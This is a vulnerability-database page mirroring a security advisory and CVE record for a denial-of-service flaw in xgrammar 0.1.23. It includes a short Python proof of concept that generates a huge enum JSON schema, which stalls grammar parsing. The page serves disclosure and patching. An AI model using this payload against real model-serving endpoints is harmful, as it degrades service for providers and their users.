github - ghsa-9q5r-wfvf-rr7f

ghsa-9q5r-wfvf-rr7f

Vulnerability from github

Published

2025-09-05 21:10

Modified

2025-09-10 20:51

Severity ?

6.9 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

Summary

xgrammar vulnerable to denial of service by huge enum grammar

Details

Summary

Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser.

Details

Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers.

Patch

This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars.

Thanks to @Seven-Streams

PoC

``` import string import random

def enum_schema(size=10000,str_len=10): enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]} schema = { "definitions": { "colorEnum": enum }, "type": "object", "properties": { "color1": { "$ref": "#/definitions/colorEnum" }, "color2": { "$ref": "#/definitions/colorEnum" }, "color3": { "$ref": "#/definitions/colorEnum" }, "color4": { "$ref": "#/definitions/colorEnum" }, "color5": { "$ref": "#/definitions/colorEnum" }, "color6": { "$ref": "#/definitions/colorEnum" }, "color7": { "$ref": "#/definitions/colorEnum" }, "color8": { "$ref": "#/definitions/colorEnum" } }, "required": [ "color1", "color2" ] } return schema

schema_enum = enum_schema() print(schema_enum) print(test_schema(schema_enum, {})) ```

where: def test_schema(schema, instance): grammar = xgr.Grammar.from_json_schema( json.dumps(schema), strict_mode=True ) return _is_grammar_accept_string(grammar, json.dumps(instance))

Impact

DOS

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "xgrammar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.1.23"
            },
            {
              "fixed": "0.1.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.1.23"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58446"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-05T21:10:06Z",
    "nvd_published_at": "2025-09-06T19:15:38Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nProvided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser.\n\n### Details\n\nFull reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers.\n\n### Patch\n\nThis problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (\u003e100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. \n\nThanks to @Seven-Streams \n\n### PoC\n```\nimport string\nimport random\n\ndef enum_schema(size=10000,str_len=10):\n    enum =  {\"enum\": [\"\".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}\n    schema = {\n        \"definitions\": {\n            \"colorEnum\": enum\n        },\n        \"type\": \"object\",\n        \"properties\": {\n            \"color1\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color2\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color3\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color4\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color5\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color6\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color7\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color8\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            }\n        },\n        \"required\": [\n                \"color1\",\n                \"color2\"\n         ]\n    }\n    return schema\n\nschema_enum = enum_schema()\nprint(schema_enum)\nprint(test_schema(schema_enum, {}))\n```\n\nwhere:\n```\ndef test_schema(schema, instance):\n    grammar = xgr.Grammar.from_json_schema(\n        json.dumps(schema),\n        strict_mode=True\n    )\n    return _is_grammar_accept_string(grammar, json.dumps(instance))\n```\n\n### Impact\nDOS",
  "id": "GHSA-9q5r-wfvf-rr7f",
  "modified": "2025-09-10T20:51:27Z",
  "published": "2025-09-05T21:10:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58446"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mlc-ai/xgrammar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "xgrammar vulnerable to denial of service by huge enum grammar"
}

CVE-2025-58446 (GCVE-0-2025-58446)

Vulnerability from cvelistv5

Published

2025-09-06 19:06

Modified

2025-09-08 17:55

Severity ?

6.9 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

CWE

CWE-770 - Allocation of Resources Without Limits or Throttling

Summary

xgrammar is an open-source library for efficient, flexible, and portable structured generation. A grammar optimizer introduced in 0.1.23 processes large grammars (>100k characters) at very low rates, and can be used for DOS of model providers. This issue is fixed in version 0.1.24.

References

URL

Tags

	https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f	x_refsource_CONFIRM
	https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	mlc-ai	xgrammar	Version: = 0.1.23, < 0.1.24

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-58446",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-09-08T17:53:36.884881Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-09-08T17:55:13.537Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "xgrammar",
          "vendor": "mlc-ai",
          "versions": [
            {
              "status": "affected",
              "version": "= 0.1.23, \u003c  0.1.24"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "xgrammar is an open-source library for efficient, flexible, and portable structured generation. A grammar optimizer introduced in 0.1.23 processes large grammars (\u003e100k characters) at very low rates, and can be used for DOS of model providers. This issue is fixed in version 0.1.24."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-770",
              "description": "CWE-770: Allocation of Resources Without Limits or Throttling",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-06T19:06:10.141Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f"
        },
        {
          "name": "https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27"
        }
      ],
      "source": {
        "advisory": "GHSA-9q5r-wfvf-rr7f",
        "discovery": "UNKNOWN"
      },
      "title": "xgrammar vulnerable to denial of service by huge enum grammar"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-58446",
    "datePublished": "2025-09-06T19:06:10.141Z",
    "dateReserved": "2025-09-01T20:03:06.533Z",
    "dateUpdated": "2025-09-08T17:55:13.537Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

ghsa-9q5r-wfvf-rr7f

Vulnerability from github

Summary

Details

Patch

PoC

Impact

CVE-2025-58446 (GCVE-0-2025-58446)

Vulnerability from cvelistv5

Tags

Sightings

Nomenclature